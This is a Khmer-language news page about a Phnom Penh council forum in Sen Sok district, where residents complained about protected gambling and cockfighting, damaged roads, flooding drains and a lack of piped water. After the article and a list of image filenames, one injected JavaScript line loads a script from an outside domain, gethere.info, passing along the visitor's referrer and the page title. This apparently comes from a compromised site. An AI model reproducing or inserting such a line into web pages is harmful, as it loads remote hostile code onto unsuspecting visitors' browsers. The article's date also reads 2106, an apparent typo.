ព្រឹតិ្តការណ៍ថ្មីៗ

ល្បែងស៊ីសង បញ្ហាផ្លូវ និងបញ្ហាទឹកស្អាត នៅតែជាក្តីកង្វល់របស់ពលរដ្ឋក្នុងខណ្ឌសែនសុខ

1 ឆ្នាំ មុន 0 តូ សុផល

ភ្នំពេញ ក្នុងវេទិកាផ្សព្វផ្សាយពិគ្រោះយោបល់របស់ក្រុមប្រឹក្សារាជធានីភ្នំពេញអាណត្តិទី២ ឆ្នាំ២០១៦ នៅខណ្ឌសែនសុខ នាព្រឹកថ្ងៃទី០២ ខែវិច្ឆិកា ឆ្នាំ២១០៦នេះ អាជ្ញាធរពាក់ព័ន្ធបានឡើងរាយការណ៍ស្តី ការសមិទ្ធផលរបស់ខ្លួនដែលសម្រេចបាន និងការដោះ ស្រាយកង្វល់ជូនប្រជាពលរដ្ឋដែលរស់នៅ ក្នុង មូលដ្ឋានរបស់ខ្លួនរយះពេលពេញ ១ឆ្នាំកន្លងមក ។ទន្ទឹមនឹងនេះ វេទិកាក៏បានបើកសិទ្ធិអោយប្រជាពលរដ្ឋ និងមន្រ្តីមូលដ្ឋានមានឪកាស ឡើងបញ្ចេញ ជាសំណូមពរ និងបង្ហាញនូវក្តីកង្វល់របស់ខ្លួនដែលកំពុងជួបប្រទះ ដើម្បីអោយគណះអធិបតីបាន ជ្រាប និងមានវិធានការដោះស្រាយជូនពួកគាត់ ។

កង្វល់ប្រហាក់ប្រហែល របស់ប្រជាពលរដ្ឋនិងមន្រ្តីមូលដ្ឋាននោះ ភាគច្រើនសំដៅលើការកសាង ហេដ្ឋារ ចនាសម្ព័ន្ធ ផ្លូវថ្នល់រងការខូចខាត ប្រព័ន្ធលូមិនដំណើរការនិងគ្មានតែម្តង បណ្តាលជន់លិចផ្លូវ និងផ្ទះ របស់ពួកគាត់។ បញ្ហាកង្វះទឹកស្អាតប្រើប្រាស់បណ្តាញរដ្ឋករទឹកពុំទាន់មានតចូលដល់លំនៅដ្ឋាន របស់ ពួកគាត់ដើម្បីប្រើប្រាស់។

ជាពិសេសទៀតនោះ ប្រជាលរដ្ឋក៏បានលើកឡើងពាក់ព័ន្ធនឹងការអនុវត្ត គោល នយោបាយភូមិសង្កាត់មានសុវត្ថិភាព គឺសំដៅទៅលើល្បែងស៊ីសងដូច ហ្គេមអនឡាញ បង្កប់ល្បែង ភ្នាល់គ្រប់ប្រភេទដែលLive ចេញពីCasino កើតមានព្រោងព្រាត ការបង្ក្រាបបានតែមួយចំអិន កំពិស តាមការអះអាងជាក់លាក់ពីលោក សាំង សុភៈវិចិត្រ អភិបាលរងទទួលបន្ទុកថា អ្នកអាចបើកហ្គេម អនឡាញបានយ៉ាងរលូនបែបនេះគឺ គេមានខ្នងបង្អែកជាសាច់ញាតិថ្នាក់ដឹកនាំកំពូលៗ៣រូប ដោយ ឡែកអ្នកគ្មានខ្នងត្រូវបិទទ្វារម្ចាស់ជាប់គុកព្រៃស។ រីឯសង្ចៀនជល់មាន់ដ៍ធំដុះស្លែនៅភូមិទំនប់ បើក លេងជាប្រចាំ និង អ្នកកាងសង្វៀនជាអ្នកមានអំណាចម្នាក់ថែមទៀតផង។

ប្រជាពលរដ្ឋម្នាក់នោះក៏បានចោទជាសំណួរទៅកាន់សមត្ថកិច្ចពាក់ព័ន្ធ ទីតាំងបញ្ជល់មាន់ ក្នុងមូលដ្ឋាន របស់គាត់ គឺឃើញតែបង្ក្រាប៥ទៅ៦ដង ចាប់យកតែលុយរួច បើកលេងហើយលេងទៀតមិនចេះ ស្រាក ស្រាន។ គាត់បានចោទជាសំណួរថា តើកន្លែង ល្បែងទាំងនោះគឺជាឆ្នាំងបាយរបស់សមត្ថកិច្ចឬ? បានជាបង្ក្រាបគ្មានប្រសិទ្ធិភាព និងកន្លែង ខ្លះទៀតមិនបង្ក្រាបសោះតែម្តង ។

ពាក់ព័ន្ធសំណូមពរ និងកង្វល់ដែលបានលើកឡើងក្នុងអង្គវេទិកានេះ គណះអធិបតីបានចាត់តាំង អោយមន្រ្តីពាក់ព័ន្ធនឹងកង្វល់ទាំងនេះឡើងធ្វើការបកស្រាយនិងពន្យល់ជូនពួកគាត់។

តែគេពុំទាន់ដឹងច្បាស់ថាអាជ្ញាធរ  សមត្ថកិច្ច និង អង្គភាពពាក់ពាក់ព័ន្ធអាចរំដោះប្រជាពលរដ្ឋអោយរួចផុតពីទុក្ខលំបាកបានកំរិតណានៅឡើយទេ?

10255357_447608032082391_1783922403303867257_n 11063732_1007332629284566_5153370449910106121_n 11113785_1007332882617874_53620123686713861_n 11224472_1007332389284590_6245308778435145562_nimage-16 image-262-1 image-263

14600940_1751624365098300_589834120048882788_n 14606532_1751624875098249_1202068432770402320_n 14632858_1751625048431565_8720792137564150379_n 14633090_1751624368431633_7233926821546895913_n 14695357_1751624511764952_432886314471806348_n 14900348_1751624941764909_6654161024511641078_n 14915407_1751624738431596_6397712154696369313_n 14915503_1751624638431606_4808956506256534066_n 14937211_1751624518431618_1176563580998708721_n 14937254_1751624645098272_2493584537754055302_n 14937352_1751624761764927_6851339345681130270_n 14938329_1751624811764922_1352832323923010990_n 14947892_1751624868431583_6556369766752139901_n 14962780_1751624605098276_8896724688814156395_n 14962797_1751624685098268_307392543446603188_n

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ